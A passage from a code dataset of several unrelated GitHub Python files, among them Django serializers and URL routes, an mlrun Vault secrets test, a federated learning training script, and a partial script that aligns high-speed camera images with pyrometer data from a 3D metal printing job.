playlists\r\n\r\n    def get_podcasts(self, obj):\r\n        podcasts = PodcastTopic.objects.filter(topic=obj.id).count()\r\n        return podcasts\r\n\r\n\r\nclass AddVideoTopicSerializer(serializers.Serializer):\r\n\r\n    def update(self, instance, validated_data):\r\n        video = self.context['video']\r\n        if VideoTopic.objects.filter(video=video, topic=instance).exists():\r\n            raise serializers.ValidationError(\r\n                'Tu tema ya contiene ese video')\r\n        instance.videos.add(video)\r\n        instance.save()\r\n        return get_object_or_404(VideoTopic, video=video, topic=instance)\r\n\r\n\r\nclass RemoveVideoTopicSerializer(serializers.Serializer):\r\n\r\n    def update(self, instance, validated_data):\r\n        video = self.context['video']\r\n        if not VideoTopic.objects.filter(video=video, topic=instance).exists():\r\n            raise serializers.ValidationError(\r\n                'Tu tema ya no contiene ese video')\r\n        instance.videos.remove(video)\r\n        instance.save()\r\n        return instance\r\n\r\n\r\nclass AddPodcastTopicSerializer(serializers.Serializer):\r\n\r\n    def update(self, instance, validated_data):\r\n        podcast = self.context['podcast']\r\n        if PodcastTopic.objects.filter(podcast=podcast, topic=instance).exists():\r\n            raise serializers.ValidationError(\r\n                'Tu tema ya contiene ese podcast')\r\n        instance.podcasts.add(podcast)\r\n        instance.save()\r\n        return get_object_or_404(PodcastTopic, podcast=podcast, topic=instance)\r\n\r\n\r\nclass RemovePodcastTopicSerializer(serializers.Serializer):\r\n\r\n    def update(self, instance, validated_data):\r\n        podcast = self.context['podcast']\r\n        if not PodcastTopic.objects.filter(podcast=podcast, topic=instance).exists():\r\n            raise serializers.ValidationError(\r\n                'Tu tema ya no contiene ese podcast')\r\n        instance.podcasts.remove(podcast)\r\n        instance.save()\r\n        return 
instance\r\n\r\n\r\nclass AddPlaylistTopicSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n playlist = self.context['playlist']\r\n\r\n if PlaylistTopic.objects.filter(playlist=playlist, topic=instance).exists():\r\n raise serializers.ValidationError(\r\n 'Tu tema ya contiene ese playlist')\r\n instance.playlists.add(playlist)\r\n instance.save()\r\n return get_object_or_404(PlaylistTopic, playlist=playlist, topic=instance)\r\n\r\n\r\nclass RemovePlaylistTopicSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n playlist = self.context['playlist']\r\n if not PlaylistTopic.objects.filter(playlist=playlist, topic=instance).exists():\r\n raise serializers.ValidationError(\r\n 'Tu tema ya no contiene ese playlist')\r\n instance.playlists.remove(playlist)\r\n instance.save()\r\n return instance\r\n","repo_name":"alexhernandez-git/django-classline","sub_path":"api/programs/serializers/program_topics.py","file_name":"program_topics.py","file_ext":"py","file_size_in_byte":6067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8651380223","text":"import requests\nimport logging\nimport json.decoder\n\n# this version of the scripts\nversion = '1.0.3'\n\n# user agent\nuseragent = \"YourServersSuck/{}\".format(version)\n\n# debug request unfinished\ndef printdebugrequest(req):\n print(req.url)\n print(req.request.headers)\n print(req.headers)\n print(req.text)\n\ndef debugrequest(req):\n logging.debug(req.url)\n logging.debug(req.request.headers)\n logging.debug(req.headers)\n logging.debug(req.text)\n\ndef get(url, sess, *, rparams={}, headers={}, accesstoken=None, raw=True, **params):\n 'This is the base get request function'\n req = sess.get(url, params=params, headers={\n 'Authorization': accesstoken,\n 'User-agent': useragent,\n **headers\n }, **rparams)\n #printdebugrequest(req)\n try:\n j = req.json()\n except json.decoder.JSONDecodeError:\n raw = False\n if raw: return j\n else: return req.text\n\n","repo_name":"Alto1772/crone-utils","sub_path":"skins/datas/reqbase.py","file_name":"reqbase.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23573334767","text":"from http import HTTPStatus\nfrom random import randrange\n\nimport pytest\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy.orm import Session\n\nfrom mlrun import mlconf\nfrom mlrun.api import schemas\n\n# Set a valid Vault token to run this test.\n# For this test, you must also have a k8s cluster available (minikube is good enough).\nuser_token = \"\"\n\n\ndef _set_vault_mlrun_configuration():\n mlconf.secret_stores.vault.url = \"http://localhost:8200\"\n mlconf.namespace = \"default-tenant\"\n mlconf.secret_stores.vault.user_token = user_token\n\n\n@pytest.mark.skipif(user_token == \"\", reason=\"no vault configuration\")\ndef test_vault_create_project_secrets(db: Session, client: TestClient):\n _set_vault_mlrun_configuration()\n\n project_name = f\"prj-{randrange(1000)}\"\n\n data = {\"provider\": \"vault\", \"secrets\": {\"secret1\": \"value1\", \"secret2\": \"value2\"}}\n\n # Test project secrets\n response = client.post(f\"/api/projects/{project_name}/secrets\", json=data)\n assert response.status_code == HTTPStatus.CREATED.value\n\n params = {\"provider\": schemas.SecretProviderName.vault.value, \"secrets\": None}\n headers = {schemas.HeaderNames.secret_store_token: 
user_token}\n\n response = client.get(\n f\"/api/projects/{project_name}/secrets\", headers=headers, params=params\n )\n secrets = response.json()[\"secrets\"]\n assert secrets == data[\"secrets\"]\n","repo_name":"jasonnIguazio/ghpages-mlrun","sub_path":"tests/api/api/test_secrets.py","file_name":"test_secrets.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28889920814","text":"from django.conf.urls import url\nfrom . import views\nfrom django.contrib.auth.views import logout\n\napp_name = 'composer'\n\nurlpatterns = [\n\n # /composer/\n url(r'^$', views.HomeView.as_view(), name='home'),\n\n # /composer/registration\n url(r'^registration$', views.RegistrationView.as_view(), name='registration'),\n\n # /composer/login\n url(r'^login$', views.LoginView.as_view(), name='login'),\n\n # /composer/profile\n url(r'^profile$', views.ProfileView.as_view(), name='profile'),\n\n # /composer/logout\n url(r'^logout$', logout, {'next_page': '/composer/'},name='logout'),\n\n # /composer/projects\n url(r'^projects$', views.ProjectsView.as_view() ,name='projects'),\n\n # /composer/projects/new\n url(r'^projects/new$', views.NewProjectView.as_view() ,name='new_project'),\n\n # /composer/project/\n url(r'^project/(?P[0-9]+)/$', views.CurrentProjectView.as_view() ,name='project'),\n\n # /composer/project//delete\n url(r'^project/(?P[0-9]+)/delete/', views.SongDelete.as_view() ,name='delete-song'),\n\n]\n","repo_name":"matei-r/music_processing","sub_path":"composer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18091303071","text":"import argparse\nimport logging\nimport os.path\nimport time\n\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom tqdm import tqdm\nfrom transformers import RobertaConfig, RobertaTokenizer, RobertaModel\n\nfrom data.manager.codedoc_data_manager import CodeDocDataManager\nfrom data.preprocess.codedoc_preprocessor import CodeDocPreprocessor\nfrom main.initialize import set_seed, get_fl_algorithm_initializer, add_code_doc_args\nfrom model.biseq2seq_model import Seq2Seq\nfrom train.codedoc_fedrod_trainer import CodeDocFedRodTrainer\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser = add_code_doc_args(parser)\n args = parser.parse_args()\n\n logging.basicConfig(\n level=logging.INFO,\n format='%(process)s %(asctime)s.%(msecs)03d - {%(module)s.py (%(lineno)d)} - %(funcName)s(): %(message)s',\n datefmt='%Y-%m-%d,%H:%M:%S')\n logging.info(args)\n\n set_seed(args.manual_seed)\n\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n config_class, model_class, tokenizer_class = RobertaConfig, RobertaModel, RobertaTokenizer\n\n config = config_class.from_pretrained(args.model_name)\n tokenizer = tokenizer_class.from_pretrained(args.model_name)\n\n encoder = model_class.from_pretrained(args.model_name, config=config)\n decoder_layer = nn.TransformerDecoderLayer(d_model=config.hidden_size, nhead=config.num_attention_heads)\n decoder = nn.TransformerDecoder(decoder_layer, num_layers=6)\n model = Seq2Seq(encoder=encoder, decoder=decoder, config=config,\n beam_size=args.beam_size, max_length=args.max_target_length,\n sos_id=tokenizer.cls_token_id, eos_id=tokenizer.sep_token_id, p_head=True)\n\n preprocessor = CodeDocPreprocessor(args=args, tokenizer=tokenizer)\n manager = CodeDocDataManager(args, preprocessor)\n\n 
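# The training branch below builds per-client train loaders, keeps one\n    # personalized head state per client (the FedRod p_head states), runs the\n    # federated rounds through the server, then saves the shared model, the\n    # heads and the label weights.\n    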
if args.do_train:\n model.to(device)\n\n train_loader_list, train_data_num_list, label_num_list = manager.load_federated_data(False, 'train',\n args.train_data_file,\n args.train_batch_size,\n args.train_partition_file)\n eval_loader = manager.load_federated_data(True, 'eval', args.eval_data_file, args.eval_batch_size)\n test_loader = manager.load_federated_data(True, 'test', args.eval_data_file, args.eval_batch_size,\n max_size=1000)\n\n args.cls_num_list = [torch.Tensor(cls_num) for cls_num in label_num_list]\n args.label_weight = [torch.Tensor(cls_num) / sum(cls_num) for cls_num in label_num_list]\n\n fl_algorithm = get_fl_algorithm_initializer(args.fl_algorithm)\n server_func = fl_algorithm(server=True)\n client_func = fl_algorithm(server=False)\n\n p_head_state_list = [{} for _ in range(args.client_num_in_total)]\n for name, param in model.state_dict().items():\n if 'p_head' in name:\n for i in range(args.client_num_in_total):\n p_head_state_list[i][name] = param.clone().detach().cpu()\n\n # counter_list = [Counter() for _ in range(args.client_num_in_total)]\n # vocab_weight_list = [[0 for _ in range(config.vocab_size)] for _ in range(args.client_num_in_total)]\n # for loader, counter, vocab_weight in tqdm(zip(train_loader_list, counter_list, vocab_weight_list),\n # desc=\"counting vocab\"):\n # for batch in loader:\n # source_ids, _, target_ids, _ = batch\n # for i in range(source_ids.shape[0]):\n # counter.update(source_ids[i].tolist())\n # counter.update(target_ids[i].tolist())\n # for key, value in counter.items():\n # vocab_weight[int(key)] = value\n # vocab_weight_list = torch.Tensor(vocab_weight_list)\n # vocab_weight_list = vocab_weight_list / vocab_weight_list.sum(dim=1).view(-1, 1)\n\n trainer = CodeDocFedRodTrainer(args, device, model, tokenizer, p_head_state_list=p_head_state_list)\n\n clients = client_func(train_loader_list, train_data_num_list, None, device, args, trainer)\n server = server_func(clients, None, eval_loader, test_loader, args, device, trainer)\n server.run()\n\n save_dir = os.path.join(args.cache_dir, \"model\", args.fl_algorithm)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n torch.save(model.state_dict(), os.path.join(save_dir, 'model.pt'))\n torch.save(trainer.p_head_state_list, os.path.join(save_dir, 'p_head.pt'))\n # torch.save(vocab_weight_list, os.path.join(save_dir, 'vocab.pt'))\n torch.save(args.label_weight, os.path.join(save_dir, \"label_weight.pt\"))\n\n if args.do_test:\n model.load_state_dict(torch.load(os.path.join(args.load_model, 'model.pt')))\n model.to(device)\n\n test_loader = manager.load_federated_data(True, 'test', args.test_data_file, args.eval_batch_size)\n\n p_head_state_list = torch.load(os.path.join(args.load_model, 'p_head.pt'))\n # vocab_weight_list = torch.load(os.path.join(args.load_model, 'vocab.pt'))\n label_weight_list = torch.load(os.path.join(args.load_model, 'label_weight.pt'))\n\n trainer = CodeDocFedRodTrainer(args, device, model, tokenizer, test_dl=test_loader,\n p_head_state_list=p_head_state_list, label_weight_list=label_weight_list)\n g_bleu = trainer.test()\n with open(os.path.join(args.output_dir, 'fedrod_bleu_test_result.txt'), 'a') as f:\n f.write(\"TEST TIME:%s\\n\" % time.asctime(time.localtime(time.time())))\n f.write(\"global bleu-4: %s\\n\\n\" % g_bleu)\n bleu_list = []\n for i in range(len(p_head_state_list)):\n trainer.set_model_params(trainer.get_model_params(), i)\n l_bleu = trainer.test(i)\n bleu_list.append(l_bleu)\n with open(os.path.join(args.output_dir, 
'fedrod_bleu_test_result.txt'), 'a') as f:\n for i, bleu in enumerate(bleu_list):\n f.write(\"client %s bleu-4: %s\\n\\n\" % (i, bleu))\n f.write(\"avg bleu-4: %s\\n\\n\" % np.mean(bleu_list))\n f.write(\"max bleu-4: %s\\n\\n\" % np.max(bleu_list))\n f.write(\"min bleu-4: %s\\n\\n\" % np.min(bleu_list))\n","repo_name":"O4thkeeper/FedCode","sub_path":"main/codedoc_fedrod.py","file_name":"codedoc_fedrod.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20693869995","text":"\"\"\"\nTransform data from the Aconity CMOS high speed camera and assign machine\ncoordinates by utilizing data from the pyrometers.\n\"\"\"\nimport pickle\nimport math\nimport csv\nimport statistics\nimport imageio\nimport numpy as np\nimport os\nimport pylab\nimport time\nimport pandas\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\n\n# Edit this line to select the job to be processed\njob_name = \"B002\"\n# Specify the CMOS camera settings.\nOffset_X = 832\nOffset_Y = 808\nWidth = 256\nHeight = 300\n\n# Specify settings for evaluating the main script\n# The script prints what it's doing\nverbal =True\n# Plots are generated and shown for intermediate results\nvisual = [False,False,False,False,False,False,False,False]\n# 0: ON/OFF plot camera\n# 1: ON/OFF plot pyrometer1\n# 2: combined ON/OFF plot\n# 3: scatter plot of image intensity @x,y position\n# 4: scatter plot of ON/OFF @x,y position\n# 5: scatter plot of vector length vs. slope\n# 6: scatter plot of melt pool area vs. pyrometer value\n# 7: two adjacent scatter plots with image position and pyrometer position\n\n# Tell program if it should only process one selected part/layer combination\n# Set True or False\ncherrypick =False\n# If set to true, specify which one\ncherry = {\n \"part\" : \"5\",\n \"layer\": \"0-06\"\n}\n\n# Set limit to reduce computing time for image processing. 
Default = None\nimage_number_limit =None\n\n\ndef create_file_list(job, **kwargs):\n \"\"\"\n Creates a list of dictionaries with data of and paths to individual part \n files, based on the CMOS data.\n \"\"\"\n file_list = []\n filename_camera_prefix = \"Jobs/{0}/hsCamera/\".format(job)\n filename_pyro1_prefix = \"Jobs/{0}/2Pyrometer/pyrometer1/\".format(job)\n filename_pyro2_prefix = \"Jobs/{0}/2Pyrometer/pyrometer2/\".format(job)\n\n # Check if only cherry picked files are requested or all job files\n if kwargs.get('cherry', None) is not None:\n part_number = kwargs.get(\"cherry\")[\"part\"]\n layer = kwargs.get(\"cherry\")[\"layer\"]\n filename_camera = filename_camera_prefix + part_number + \"/\" + layer + \".mkv\"\n l_pyro = layer.split('.')[0].replace(\"-\",\".\") + '.pcd'\n filename_pyro1 = filename_pyro1_prefix + part_number + \"/\" + l_pyro\n filename_pyro2 = filename_pyro2_prefix + part_number + \"/\" + l_pyro\n file_dict ={'filename_camera':filename_camera,\n 'filename_pyro1': filename_pyro1,\n 'filename_pyro2': filename_pyro2,\n 'part_number':part_number,\n 'layer':layer.split('.')[0]}\n file_list.append(file_dict)\n else:\n part_number_list = os.listdir(filename_camera_prefix)\n # Create a dictionary with file information for every single file\n for part_number in part_number_list:\n layer_list = os.listdir(filename_camera_prefix + part_number)\n for layer in layer_list:\n if layer.endswith('.pkl'):\n # ignore the previously processed files\n continue\n filename_camera = filename_camera_prefix + part_number + \"/\" + layer\n l_pyro = layer.split('.')[0].replace(\"-\",\".\") + '.pcd'\n filename_pyro1 = filename_pyro1_prefix + part_number + \"/\" + l_pyro\n filename_pyro2 = filename_pyro2_prefix + part_number + \"/\" + l_pyro\n file_dict ={'filename_camera':filename_camera,\n 'filename_pyro1': filename_pyro1,\n 'filename_pyro2': filename_pyro2,\n 'part_number':part_number,\n 'layer':layer.split('.')[0]}\n file_list.append(file_dict)\n return(file_list)\n\ndef process_mkv(file):\n \"\"\"\n Process a .mkv file into a dataframe.\n \"\"\"\n image_array = []\n image_index_array = []\n intensity_array = []\n meltpool_area_array = []\n brightest_pixel_array = []\n\n\n CMOS_video = imageio.get_reader(file['filename_camera'], 'ffmpeg')\n # Image borders where the melt pool is situated:\n x_min = 850\n x_max = 950\n y_min = 810\n y_max = 910\n # Set a threshhold value to prevent melt pools from being classified as\n # noise.\n noise_threshold_value = 23\n meltpool_threshold_value = 23\n # Create an empty noise mask which is subtracted from all pictures.\n noise_mask = np.full([y_max-y_min,x_max-x_min],0)\n noise_picture_total = 0\n\n for frame_number, image in enumerate(CMOS_video, start=1):\n if image_number_limit is not None and frame_number > image_number_limit:\n break\n # Convert image to black and white\n image_bw = image[:,:,0].reshape(image.shape[0],image.shape[1])\n\n # Crop image to relevant area\n image_cropped = image_bw[\n (y_min - Offset_Y):(y_max - Offset_Y),\n (x_min - Offset_X):(x_max - Offset_X)\n ]\n # Update noise_mask\n if np.amax(image_cropped) < noise_threshold_value:\n noise_mask += image_cropped\n noise_picture_total +=1\n\n image_array.append(image_cropped)\n image_index_array.append(frame_number)\n\n # average noise mask\n noise_mask = np.divide(noise_mask,\n np.full(noise_mask.shape,noise_picture_total))\n\n for index, image in enumerate(image_array):\n # denoise images\n image_min_noise = (image - noise_mask)\n # convert negative pixels to 0\n 
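# (subtracting the averaged noise mask can push pixel values below zero)\n        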
image_min_noise[image_min_noise < 0] = 0\n image_array[index] = image_min_noise.astype(np.uint8)\n # calculate total intensity\n intensity_array.append(np.sum(image_array[index]))\n # find brightest pixel. Is required for normalizing image brightness\n # when displayed\n brightest_pixel_array.append(np.max(image_array[index]))\n\n # calculate melt pool area\n image_area = image_min_noise\n image_area[image_area< meltpool_threshold_value] = 0\n image_area[image_area>= meltpool_threshold_value] = 1\n meltpool_area = np.sum(image_area)\n meltpool_area_array.append(meltpool_area)\n\n intensity_array = np.array(intensity_array, dtype=np.int64)\n\n\n # Calculate upper threshold value for Laser OFF intensity level\n # Note: the first value usually is zero\n OFF_level_array = np.array(intensity_array[1:21])\n mean = statistics.mean(OFF_level_array)\n OFF_threshold = mean + 6 * statistics.pstdev(OFF_level_array,mean)\n if verbal:\n print(\"Threshold value = \" + str(OFF_threshold))\n \n # Determine if below or above threshold\n signs_array = (np.sign(intensity_array - OFF_threshold) +1)/2\n \n # store processed images as a python pickle file\n df_images = pandas.DataFrame(index=image_index_array)\n df_images['image'] = image_array\n df_images['area_threshold'] = meltpool_threshold_value\n df_images['brightest_pixel'] = np.max(brightest_pixel_array)\n filename_pkl = file['filename_camera'].replace(\".mkv\",\"_images.pkl\")\n df_images.to_pickle(filename_pkl)\n \n # Create dataframe that is returned.\n # This dataframe is not stored here, since it makes more sense to store it \n # after it has been extended with coordinates.\n df = pandas.DataFrame(index=image_index_array)\n df['intensity'] = intensity_array\n df['meltpool_area'] = meltpool_area_array\n df['ON_OFF'] = signs_array\n df['threshold'] = OFF_threshold\n df['part'] = file['part_number']\n df['layer'] = file['layer']\n df['index'] = image_index_array\n return df\n\n\ndef process_pcd(file):\n df = pandas.DataFrame()\n with open(file['filename_pyro1'], \"r\", newline='\\n') as pyro_file:\n reader = csv.reader(pyro_file, delimiter=' ')\n scanner_id = next(reader)\n scanner_protocol = next(reader)\n scanner_x_field_size = next(reader)\n scanner_y_field_size = next(reader)\n scanner_x_offset = next(reader)\n scanner_y_offset = next(reader)\n scanner_rotation = next(reader)\n scanner_field_correction_file = next(reader)\n pyro_data = np.array(list(reader)).astype(np.int64)\n assert np.sum(pyro_data[:,2]-pyro_data[:,3]) == 0, \"The data in the two pyro value columns does not match\"\n # Compute velocity profile\n dt = 1 # time interval for dx/dt, dy/dt\n Dx = np.diff(pyro_data[:,0], dt).astype(np.float)\n Dy = np.diff(pyro_data[:,1], dt).astype(np.float)\n Dx_mm, Dy_mm = bit2mm(Dx, Dy)\n velocity_array_mm = np.linalg.norm(np.stack((Dx_mm,Dy_mm), axis=1), axis=1) / dt\n window_width = 20\n velocity_array_smoothed_mm = np.convolve(velocity_array_mm, np.ones(window_width),mode='same') / window_width\n # Convert velocity from mm*100kHz to mm/s\n velocity_array_smoothed_mmps = velocity_array_smoothed_mm * 1e5\n # Determine vectors based upon hatch speed\n scan_velocity_hatch_mmps = 900 #mm/s\n scan_velocity_contour_mmps = 1200 #mm/s\n # check lower boundary\n signs_array_lower = (np.sign(velocity_array_smoothed_mmps - (scan_velocity_hatch_mmps -200)) + 1)/2\n # check upper boundary\n signs_array_upper = (np.sign(scan_velocity_hatch_mmps + 300 - velocity_array_smoothed_mmps) +1)/2\n initial_high_speed = np.where(signs_array_upper < 1)[0]\n try:\n lower 
= initial_high_speed[0]\n upper = initial_high_speed[-1]\n signs_array_upper[np.arange(lower-50,upper+71,1)] = 0\n signs_array = np.multiply(signs_array_lower, signs_array_upper)\n except:\n print(\"Warning: No initial high velocity in pyrometer data detected.\")\n signs_array = np.multiply(signs_array_lower, signs_array_upper)\n\n # Pack data into dataframe and return\n df['x'] = pyro_data[dt:,0]\n df['y'] = pyro_data[dt:,1]\n df['intensity'] = pyro_data[dt:,2]\n df['velocity'] = velocity_array_smoothed_mmps\n df['ON_OFF'] = signs_array\n df['threshold'] = scan_velocity_hatch_mmps\n filename_pkl = file['filename_pyro1'].replace(\".pcd\",\".pkl\")\n df.to_pickle(filename_pkl)\n return df\n\n\ndef extend_CMOS_data(df_camera, df_pyro):\n \"\"\"\n Extend the CMOS camera dataframe with coordinates for each image, derived\n from the pyrometer data.\n \"\"\"\n # Create dictionary for results which do not fit in the df_camera or df_pyro\n results = {}\n\n # note: interval value comes from experimenting, is dependent on skywriting \n # strategy.\n camera_off_interval = 4\n camera_ON = np.where(df_camera['ON_OFF'] == 1)[0]\n # calculate distance between ON images\n camera_dist_on_on = np.diff(camera_ON)\n # check where distance is corresponds to a minimal OFF-interval expected \n # between 2 scan vectors. The indice corresponds to the start of the\n # interval.\n camera_off_interval_start = np.where(camera_dist_on_on >= camera_off_interval)[0]\n camera_off_interval_length = camera_dist_on_on[camera_off_interval_start]\n # find midpoints of intervals within the CMOS indices\n camera_off_midpoints = np.round(camera_ON[camera_off_interval_start] + 1 +\n camera_off_interval_length/2)\n camera_num_scan_vectors = len(camera_off_interval_start) + 1\n results.update({\n \"camera_midpoints\": camera_off_midpoints,\n \"camera_interval_length\": camera_off_interval_length,\n \"camera_num_vectors\": camera_num_scan_vectors})\n\n # do the same thing for the pyrometer data\n # note: interval value comes from experimenting, is dependent on skywriting \n # strategy.\n pyro_off_interval = 40\n pyro_ON = np.where(df_pyro['ON_OFF'] == 1)[0]\n # calculate distance between ON data points\n pyro_dist_on_on = np.diff(pyro_ON)\n # check where distance is corresponds to a minimal OFF-interval expected \n # between 2 scan vectors. 
The indice corresponds to the start of the\n # interval.\n pyro_off_interval_start = np.where(pyro_dist_on_on >= pyro_off_interval)[0]\n pyro_off_interval_length = pyro_dist_on_on[pyro_off_interval_start]\n # find midpoints of intervals within the pyrometer indices\n pyro_off_midpoints = np.round(pyro_ON[pyro_off_interval_start] + 1 +\n pyro_off_interval_length/2)\n pyro_num_scan_vectors = len(pyro_off_interval_start) + 1\n # todo (optional): remove very short scan vectors from pyro vectors if the \n # camera is unable to recognize them.\n results.update({\n \"pyro_midpoints\": pyro_off_midpoints,\n \"pyro_interval_length\": pyro_off_interval_length,\n \"pyro_num_vectors\": pyro_num_scan_vectors})\n results.update({\"slopes\":[]})\n results.update({\"slope_errors\":[]})\n results.update({\"camera_delta\":[]})\n results.update({\"pyro_delta\":[]})\n\n print(\"DETECTED MIDPOINTS: CAMERA={} PYRO={}\".format(camera_num_scan_vectors,pyro_num_scan_vectors))\n df_camera['index_pyro'] = np.nan\n if camera_num_scan_vectors == pyro_num_scan_vectors:\n print(\"Midpoint numbers match, do pointwise scaling\")\n # linearly scale the CMOS timescales between each midpoint interval\n for index, camera_midpoint in enumerate(camera_off_midpoints[:-1]):\n camera_start = camera_midpoint\n camera_end = camera_off_midpoints[index+1]\n pyro_start = pyro_off_midpoints[index]\n pyro_end = pyro_off_midpoints[index+1]\n # compute linear scaling factors\n camera_delta = camera_end-camera_start\n pyro_delta = pyro_end-pyro_start\n slope = (pyro_delta)/(camera_delta)\n results[\"slopes\"].append(slope)\n slope_err = slope_error(camera_delta,pyro_delta)\n results[\"slope_errors\"].append(slope_err)\n results[\"camera_delta\"].append(camera_delta)\n results[\"pyro_delta\"].append(pyro_delta)\n # get offset from end points since they tend to be more accurate \n # than start points\n offset = pyro_end - slope*camera_end\n df_camera.loc[ int(camera_start):int(camera_end),'index_pyro' ] = df_camera.loc[\n int(camera_start):int(camera_end),'index'] * slope + offset\n # linearly scale all images outside the midpoints\n camera_start = camera_off_midpoints[0]\n camera_end = camera_off_midpoints[-1]\n pyro_start = pyro_off_midpoints[0]\n pyro_end = pyro_off_midpoints[-1]\n # compute linear scaling factors\n slope = (pyro_end - pyro_start)/(camera_end - camera_start)\n offset = pyro_end - slope*camera_end\n df_camera.loc[:int(camera_start),'index_pyro'] = df_camera.loc[\n :int(camera_start),'index'] * slope + offset\n df_camera.loc[int(camera_end):,'index_pyro'] = df_camera.loc[\n int(camera_end):,'index'] * slope + offset\n # round values to the closest index\n df_camera['index_pyro'] = df_camera['index_pyro'].round()\n results.update({\"method\": \"linear pointwise\"})\n else:\n print(\"Midpoint numbers do not match, do simple linear scaling\")\n # linearly scale the entire CMOS timescale\n camera_ON = np.where(df_camera['ON_OFF'] == 1)\n camera_ON_start = camera_ON[0][0]\n camera_ON_end = camera_ON[0][-1]\n pyro_ON = np.where(df_pyro['ON_OFF'] == 1)\n pyro_ON_start = pyro_ON[0][0]\n pyro_ON_end = pyro_ON[0][-1]\n # compute linear scaling factors\n camera_delta=camera_ON_end-camera_ON_start\n pyro_delta=pyro_ON_end-pyro_ON_start\n slope = (pyro_delta)/(camera_delta)\n results[\"slopes\"].append(slope)\n slope_err = slope_error(camera_delta,pyro_delta)\n results[\"slope_errors\"].append(slope_err)\n results[\"camera_delta\"].append(camera_delta)\n results[\"pyro_delta\"].append(pyro_delta)\n offset = pyro_ON_end - slope * 
camera_ON_end\n df_camera['index_pyro'] = df_camera['index'] * slope + offset\n df_camera['index_pyro'] = df_camera['index_pyro'].round()\n results.update({\"method\": \"linear single\"})\n\n # compute machine coordinates of each camera image\n x_array = []\n y_array = []\n pyro_value_array = []\n for index_pyro in df_camera['index_pyro']:\n x_array.append(df_pyro.at[int(index_pyro),'x'],)\n y_array.append(df_pyro.at[int(index_pyro),'y'],)\n pyro_value_array.append(df_pyro.at[int(index_pyro),'intensity'],)\n df_camera['x'] = x_array\n df_camera['y'] = y_array\n x_array_mm, y_array_mm = bit2mm(df_camera['x'],df_camera['y'])\n df_camera['x_mm'] = x_array_mm\n df_camera['y_mm'] = y_array_mm\n df_camera['pyro_value'] = pyro_value_array\n \n return(df_camera, df_pyro, results)\n\n\ndef slope_error(dc, dp):\n \"\"\"\n Compute the error of the slope function. c = camera, p = pyrometer\n \"\"\"\n delta_dc = math.sqrt(2)\n delta_dp = math.sqrt(2)\n dp_err = (1/dc)*delta_dp\n dc_err = (dp/(dc**2))*(-1)*delta_dc\n slope_err = math.sqrt(dp_err**2 + dc_err**2)\n return(slope_err)\n\ndef plot_data(df_camera, df_pyro, results, selection):\n \"\"\"\n Generate plots from the data generated during the sensor data processing.\n \"\"\"\n part = df_camera[\"part\"][1]\n layer = df_camera[\"layer\"][1]\n if selection[0]:\n # Plot the results of the CMOS ON/OFF detection\n fig, ax = plt.subplots(figsize=(8,5))\n line1, = ax.plot(df_camera[\"intensity\"],color=\"cornflowerblue\",label=\"intensity\")\n line2 = ax.axhline(df_camera[\"threshold\"][1], color=\"navy\",label=\"intensity threshold\")\n x = results[\"camera_midpoints\"]\n y = np.ones(len(x)) * df_camera['threshold'][1]\n line3 = ax.scatter(x,y,c=\"green\",label=\"midpoints\")\n ax.set_ylabel(\"Intensity\")\n ax.set_xlabel(\"image number\")\n ax2 = ax.twinx()\n line4, = ax2.plot(df_camera[\"ON_OFF\"],color=\"orangered\",label=\"ON / OFF\")\n ax2.set_ylabel(\"OFF / ON\")\n ax.legend(handles=[line1,line2,line3,line4],loc=0)\n ax.set_title(\"ON/OFF detection of CMOS image: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n plt.show()\n if selection[1]:\n # Plot the results of the pyro velocity ON/OFF detection\n fig, ax = plt.subplots()\n line1, = ax.plot(df_pyro[\"velocity\"],color=\"cornflowerblue\",label=\"velocity\")\n line2 = ax.axhline(df_pyro[\"threshold\"][1], color=\"navy\",label=\"scan speed parameter\")\n x = results[\"pyro_midpoints\"]\n y = np.ones(len(x)) * df_pyro['threshold'][1]\n line3 = ax.scatter(x,y,c=\"darkgreen\",label=\"midpoints\")\n ax.set_ylabel(\"velocity [mm/s]\")\n ax.set_xlabel(\"measurement number\")\n ax2 = ax.twinx()\n line4, = ax2.plot(df_pyro[\"ON_OFF\"],color=\"orangered\",label=\"ON / OFF\")\n ax2.set_ylabel(\"OFF / ON\")\n ax.set_title(\"ON/OFF detection of pyro velocity: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n plt.show()\n if selection[2]:\n # Compare the results from the two ON/OFF detections\n fig, ax = plt.subplots()\n line1 = ax.plot(df_camera['index_pyro'],df_camera['ON_OFF'],color=\"navy\",label=\"CMOS camera\")\n ax.set_ylabel(\"OFF / ON\")\n ax.set_xlabel(\"pyrometer measurement index\")\n ax2 = ax.twinx()\n line2 = ax2.plot(df_pyro['ON_OFF'],color=\"orangered\",label=\"pyrometer 1\")\n ax2.set_ylabel(\"OFF / ON\")\n # These lines are required to get one combined legend\n line_sum = line1 + line2\n labels = [line.get_label() for line in line_sum]\n ax.legend(line_sum, labels, loc=0)\n ax.set_title(\"ON/OFF detection comparison: \" +\n \"PART {} | LAYER {}\".format(part, layer))\n plt.show()\n if 
